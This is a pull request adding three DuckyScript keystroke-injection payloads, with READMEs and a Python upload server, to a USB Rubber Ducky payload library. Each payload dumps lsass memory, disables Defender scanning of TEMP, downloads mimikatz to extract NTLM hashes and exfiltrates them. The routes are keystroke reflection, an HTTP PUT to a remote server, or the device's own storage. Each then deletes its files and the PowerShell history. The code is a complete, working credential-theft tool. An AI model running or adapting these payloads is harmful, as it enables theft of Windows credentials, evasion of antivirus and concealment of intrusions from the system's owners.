### PR TITLE
Added payload to exfiltrate Windows credentials using different techniques.

### DIFF
--- a/payloads/library/exfiltration/ExfiltrateWindowsCredentials/KeystrokeReflection/README.md
+++ b/payloads/library/exfiltration/ExfiltrateWindowsCredentials/KeystrokeReflection/README.md
@@ -1,0 +1,23 @@
+# Exfiltration of Windows Credentials using Keystroke Reflection
+
+Script to dump Windows Credentials using mimikatz and exfiltrate sensitive information using keystroke reflection.
+
+**Category**: Credentials, Exfiltration
+
+## Description
+
+This script creates a memory dump of the lsass.exe process using the TaskManager, downloads and uses mimikatz to extract credentials from the dump file and exfiltrates data using keystroke reflection to a file on the USB Rubber Ducky. For more information about keystroke reflection, click [here](https://shop.hak5.org/pages/keystroke-reflection?srsltid=AfmBOophL1ZvvnOASWmd7Stb2XP1OteANu-6b0FsPoCPYPe2aihVp3TU). 
+
+Cleanup is performed after the exfiltration is completed. This cleanup includes the removal of temporary files and the deletion of the PowerShell history on line 121.
+
+## Getting Started
+
+### Dependencies
+
+* Permission to Attack
+* Internet Connection
+* Webserver hosting mimikatz.exe
+
+### Settings
+
+* Set the server URL for your webserver

--- a/payloads/library/exfiltration/ExfiltrateWindowsCredentials/KeystrokeReflection/payload.txt
+++ b/payloads/library/exfiltration/ExfiltrateWindowsCredentials/KeystrokeReflection/payload.txt
@@ -1,0 +1,121 @@
+REM Title: DuckyScript payload for data exfiltration using keystroke reflection
+REM Author: jakobfriedl
+ATTACKMODE HID
+
+REM OS Detection to ensure the target is Windows
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+END_EXTENSION
+
+IF ($_OS != WINDOWS)                                                                                                                 
+    LED_R                                                                                                                                       
+    STOP_PAYLOAD 
+END_IF
+
+REM Define the URL of the server hosting the mimikatz executable
+DEFINE #SERVER_URL http://XXX.XXX.XXX.XXX
+
+DELAY 1000
+LED_OFF
+SAVE_HOST_KEYBOARD_LOCK_STATE
+$_EXFIL_MODE_ENABLED = TRUE
+$_EXFIL_LEDS_ENABLED = TRUE
+REM Delete existing dump file
+GUI r
+DELAY 200
+STRINGLN powershell "rm $env:TEMP\lsass.DMP"
+DELAY 200
+
+REM Create lsass-dump using the TaskManager
+GUI r
+DELAY 200
+STRING taskmgr
+CTRL-SHIFT ENTER
+DELAY 500
+ALT y
+DELAY 500
+DOWNARROW
+DELAY 1000
+STRING lsass
+DELAY 500
+SHIFT F10
+$I = 0
+WHILE ($I < 5) 
+    UPARROW
+    $I = ($I + 1)
+END_WHILE
+ENTER
+DELAY 500
+ENTER
+ALT F4
+
+REM Add exclusion path to the Windows Defender settings
+GUI r
+DELAY 200
+STRING powershell.exe
+CTRL-SHIFT ENTER
+DELAY 500
+ALT y
+DELAY 500
+STRINGLN if((Get-MpComputerStatus).RealTimeProtectionEnabled){Set-MpPreference -ExclusionPath $env:TEMP}
+
+REM Download mimikatz.exe from webserver
+STRINGLN wget #SERVER_URL/mimikatz.exe -o $env:TEMP\mimikatz.exe
+DELAY 1000
+
+REM Execute mimikatz and the necessary commands
+STRINGLN cd $env:TEMP
+STRINGLN .\mimikatz.exe "privilege::debug"
+STRINGLN log exfiltration.log
+STRINGLN sekurlsa::minidump lsass.DMP
+STRINGLN sekurlsa::logonpasswords
+DELAY 5000
+CTRL c
+DELAY 500
+
+REM Format mimikatz-log for exfiltration
+STRINGLN cat .\exfiltration.log | Select-String -Pattern "NTLM" -Context 2,0  | Get-Unique > credentials.txt
+
+REM Exfiltration
+REM Convert the data in credentials.txt to NUMLOCK and CAPSLOCK values and terminate with SCROLLLOCK
+STRINGLN foreach($byte in $(cat $env:TEMP\credentials.txt -En by)){foreach($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01) {if($byte -band $a){$o+='%{NUMLOCK}'} else{$o+='%{CAPSLOCK}'}}}; $o+='%{SCROLLLOCK}' 
+DELAY 200
+
+REM Reflect the keystrokes back to the USB Rubber Ducky
+STRINGLN Add-Type -A System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait($o)
+DELAY 200
+
+REM SCROLLLOCK indicates that exfiltration has completed
+WAIT_FOR_SCROLL_CHANGE
+LED_G
+$_EXFIL_MODE_ENABLED = FALSE
+RESTORE_HOST_KEYBOARD_LOCK_STATE
+
+REM Clean-up 
+REM Remove files
+STRINGLN rm $env:TEMP\lsass.DMP
+STRINGLN rm $env:TEMP\mimikatz.exe
+STRINGLN rm $env:TEMP\exfiltration.log
+STRINGLN rm $env:TEMP\credentials.txt
+REM Reset configurations
+STRINGLN Remove-MpPreference -ExclusionPath $env:TEMP
+REM Delete Powershell history
+STRINGLN rm (Get-PSReadLineOption).HistorySavePath

--- a/payloads/library/exfiltration/ExfiltrateWindowsCredentials/NetworkMedium/README.md
+++ b/payloads/library/exfiltration/ExfiltrateWindowsCredentials/NetworkMedium/README.md
@@ -1,0 +1,25 @@
+# Exfiltration of Windows Credentials over a Network Medium
+
+Script to dump Windows Credentials using mimikatz and exfiltrate sensitive information to a webserver.
+
+**Category**: Credentials, Exfiltration
+
+## Description
+
+This script creates a memory dump of the lsass.exe process using the TaskManager, downloads and uses mimikatz to extract credentials from the dump file and exfiltrates compressed data to a remote webserver over a network. Cleanup is performed after the exfiltration is completed.
+
+Cleanup is performed after the exfiltration is completed. This cleanup includes the removal of temporary files and the deletion of the PowerShell history on line 121.
+
+## Getting Started
+
+### Dependencies
+
+* Permission to Attack
+* Internet Connection
+* Webserver hosting mimikatz.exe
+* Webserver for receiving the exfiltrated data ([server.py](./server.py))
+
+### Settings
+
+* Set the URL for your webserver
+* Set the URL for the webserver that receives the exfiltrated data

--- a/payloads/library/exfiltration/ExfiltrateWindowsCredentials/NetworkMedium/payload.txt
+++ b/payloads/library/exfiltration/ExfiltrateWindowsCredentials/NetworkMedium/payload.txt
@@ -1,0 +1,121 @@
+REM Title: DuckyScript payload for data exfiltration over a network medium
+REM Author: jakobfriedl
+ATTACKMODE HID
+
+REM OS Detection to ensure the target is Windows
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+END_EXTENSION
+
+IF ($_OS != WINDOWS)                                                                                                                 
+    LED_R                                                                                                                                       
+    STOP_PAYLOAD 
+END_IF
+
+REM Define the URL of the server hosting the mimikatz executable
+DEFINE #SERVER_URL http://XXX.XXX.XXX.XXX
+
+REM Define the URL of the webserver to exfiltrate the credentials to
+DEFINE #EXFIL_URL http://XXX.XXX.XXX.XXX
+
+DELAY 1000
+
+REM Delete existing dump file
+GUI r
+DELAY 200
+STRINGLN powershell "rm $env:TEMP\lsass.DMP"
+DELAY 200
+
+REM Create lsass-dump using the TaskManager
+GUI r
+DELAY 200
+STRING taskmgr
+CTRL-SHIFT ENTER
+DELAY 500
+ALT y
+DELAY 500
+DOWNARROW
+DELAY 1000
+STRING lsass
+DELAY 500
+SHIFT F10
+$I = 0
+WHILE ($I < 5) 
+    UPARROW
+    $I = ($I + 1)
+END_WHILE
+ENTER
+DELAY 500
+ENTER
+ALT F4
+
+REM Add exclusion path to the Windows Defender settings
+GUI r
+DELAY 200
+STRING powershell.exe
+CTRL-SHIFT ENTER
+DELAY 500
+ALT y
+DELAY 500
+STRINGLN if((Get-MpComputerStatus).RealTimeProtectionEnabled){Set-MpPreference -ExclusionPath $env:TEMP}
+
+REM Download mimikatz.exe from webserver
+STRINGLN wget #SERVER_URL/mimikatz.exe -o $env:TEMP\mimikatz.exe
+DELAY 1000
+
+REM Execute mimikatz and the necessary commands
+STRINGLN cd $env:TEMP
+STRINGLN .\mimikatz.exe "privilege::debug"
+STRINGLN log exfiltration.log
+STRINGLN sekurlsa::minidump lsass.DMP
+STRINGLN sekurlsa::logonpasswords
+DELAY 5000
+CTRL c
+DELAY 500
+
+REM Format mimikatz-log for exfiltration
+STRINGLN cat .\exfiltration.log | Select-String -Pattern "NTLM" -Context 2,0  | Get-Unique > credentials.txt
+
+REM Create zip archive of prepared data
+DEFINE #archive $env:COMPUTERNAME'-exfiltration-data.zip'
+STRING Compress-Archive -Force -Path $env:TEMP\exfiltration.log, $env:TEMP\credentials.txt -DestinationPath $env:TEMP\
+STRINGLN #archive
+DELAY 500
+
+REM Exfiltration
+STRING Invoke-WebRequest -Method PUT -InFile $env:TEMP\
+STRING #archive
+SPACE 
+STRING -Uri #EXFIL_URL
+STRINGLN #archive
+DELAY 500
+
+REM Clean-up
+REM Remove files
+STRINGLN rm $env:TEMP\lsass.DMP
+STRINGLN rm $env:TEMP\mimikatz.exe
+STRINGLN rm $env:TEMP\exfiltration.log
+STRINGLN rm $env:TEMP\credentials.txt
+STRINGLN rm $env:TEMP\data.zip
+REM Reset configurations
+STRINGLN Remove-MpPreference -ExclusionPath $env:TEMP
+REM Delete Powershell history
+STRINGLN rm (Get-PSReadLineOption).HistorySavePath

--- a/payloads/library/exfiltration/ExfiltrateWindowsCredentials/NetworkMedium/server.py
+++ b/payloads/library/exfiltration/ExfiltrateWindowsCredentials/NetworkMedium/server.py
@@ -1,0 +1,29 @@
+#!/usr/bin/env python
+import os
+import http.server as server
+
+class HTTPRequestHandler(server.SimpleHTTPRequestHandler):
+    # Handle file upload via PUT request
+    def do_PUT(self):
+        name = os.path.basename(self.path)
+
+        length = int(self.headers['Content-Length'])
+        r = 0
+        with open(name, 'wb+') as file:
+            while r < length:
+                n = self.rfile.read(min(66556, length - r))
+                r += len(n)
+                file.write(n)
+        self.send_response(201, 'Created')
+        self.end_headers()
+        reply_body = f'Saved {name}\n'
+        self.wfile.write(reply_body.encode('utf-8'))
+
+    # Prevent file download
+    def do_GET(self):
+        self.send_response(404, 'Not Found')
+        self.end_headers()
+        self.wfile.write(b'')
+
+if __name__ == '__main__':
+    server.test(HandlerClass=HTTPRequestHandler)

--- a/payloads/library/exfiltration/ExfiltrateWindowsCredentials/PhysicalMedium/README.md
+++ b/payloads/library/exfiltration/ExfiltrateWindowsCredentials/PhysicalMedium/README.md
@@ -1,0 +1,23 @@
+# Exfiltration of Windows Credentials over a Physical Medium
+
+Script to dump Windows Credentials using mimikatz and exfiltrate sensitive information over a physical medium.
+
+**Category**: Credentials, Exfiltration
+
+## Description
+
+This script creates a memory dump of the lsass.exe process using the TaskManager, downloads and uses mimikatz to extract credentials from the dump file and exfiltrates data to the SSD storage of the USB Rubber Ducky. The exfiltrated data is stored in a folder with the name of the computer that is attacked. 
+
+Cleanup is performed after the exfiltration is completed. This cleanup includes the removal of temporary files and the deletion of the PowerShell history on line 116.
+
+## Getting Started
+
+### Dependencies
+
+* Permission to Attack
+* Internet Connection
+* Webserver hosting mimikatz.exe
+
+### Settings
+
+* Set the server URL for your webserver

--- a/payloads/library/exfiltration/ExfiltrateWindowsCredentials/PhysicalMedium/payload.txt
+++ b/payloads/library/exfiltration/ExfiltrateWindowsCredentials/PhysicalMedium/payload.txt
@@ -1,0 +1,116 @@
+REM Title: DuckyScript payload for data exfiltration over a physical medium
+REM Author: jakobfriedl
+ATTACKMODE HID STORAGE
+
+REM OS Detection to ensure the target is Windows
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+END_EXTENSION
+
+IF ($_OS != WINDOWS)                                                                                                                 
+    LED_R                                                                                                                                       
+    STOP_PAYLOAD 
+END_IF
+
+REM Define the URL of the server hosting the mimikatz executable
+DEFINE #SERVER_URL http://XXX.XXX.XXX.XXX
+
+DELAY 1000
+REM Delete existing dump file
+GUI r
+DELAY 200
+STRINGLN powershell "rm $env:TEMP\lsass.DMP"
+DELAY 200
+
+REM Create lsass-dump using the TaskManager
+GUI r
+DELAY 200
+STRING taskmgr
+CTRL-SHIFT ENTER
+DELAY 500
+ALT y
+DELAY 500
+DOWNARROW
+DELAY 1000
+STRING lsass
+DELAY 500
+SHIFT F10
+$I = 0
+WHILE ($I < 5) 
+    UPARROW
+    $I = ($I + 1)
+END_WHILE
+ENTER
+DELAY 500
+ENTER
+ALT F4
+
+REM Add exclusion path to the Windows Defender settings
+GUI r
+DELAY 200
+STRING powershell.exe
+CTRL-SHIFT ENTER
+DELAY 500
+ALT y
+DELAY 500
+STRINGLN if((Get-MpComputerStatus).RealTimeProtectionEnabled){Set-MpPreference -ExclusionPath $env:TEMP}
+
+REM Download mimikatz.exe from webserver
+STRINGLN wget #SERVER_URL/mimikatz.exe -o $env:TEMP\mimikatz.exe
+DELAY 1000
+
+REM Execute mimikatz and the necessary commands
+STRINGLN cd $env:TEMP
+STRINGLN .\mimikatz.exe "privilege::debug"
+STRINGLN log exfiltration.log
+STRINGLN sekurlsa::minidump lsass.DMP
+STRINGLN sekurlsa::logonpasswords
+DELAY 5000
+CTRL c
+DELAY 500
+
+REM Format mimikatz-log for exfiltration
+STRINGLN cat .\exfiltration.log | Select-String -Pattern "NTLM" -Context 2,0  | Get-Unique > credentials.txt
+
+REM Getting the drive letter of the USB Rubber Ducky
+STRINGLN $d=(Get-Volume -FileSystemLabel 'DUCKY').DriveLetter
+
+REM Creating a directory on the USB Rubber Ducky to store the files
+DEFINE #exfil_dir $d':/'$env:COMPUTERNAME'-exfiltration-data'
+STRING mkdir
+SPACE
+STRINGLN #exfil_dir
+
+REM Exfiltration
+STRING mv -Force $env:TEMP\exfiltration.log
+SPACE
+STRINGLN #exfil_dir
+DELAY 1000
+STRING mv -Force $env:TEMP\credentials.txt
+SPACE
+STRINGLN #exfil_dir
+
+REM Clean-up 
+STRINGLN rm $env:TEMP\lsass.DMP
+STRINGLN rm $env:TEMP\mimikatz.exe
+STRINGLN Remove-MpPreference -ExclusionPath $env:TEMP
+STRINGLN Clear-Variable -Name d
+STRINGLN rm (Get-PSReadLineOption).HistorySavePath


### PR DESCRIPTION
The added payloads perform credential dumping by creating a memory dump of the lsass.exe process via the TaskManager and using mimikatz to extract NTLM hashes. These sensitive credentials are then exfiltrated in three different ways:

    Over a physical medium by writing the data to the USB Rubber Ducky's SD storage
    Over a network medium by uploading the data to a webserver
    Via Keystroke Reflection

The payload further performs adequate cleanup after the exfiltration is completed.

Changes requested in a previous pull request (#519) have been implemented and include restructuring of the files, OS detection and a notice that the PowerShell history file is removed after the payload finishes execution. 
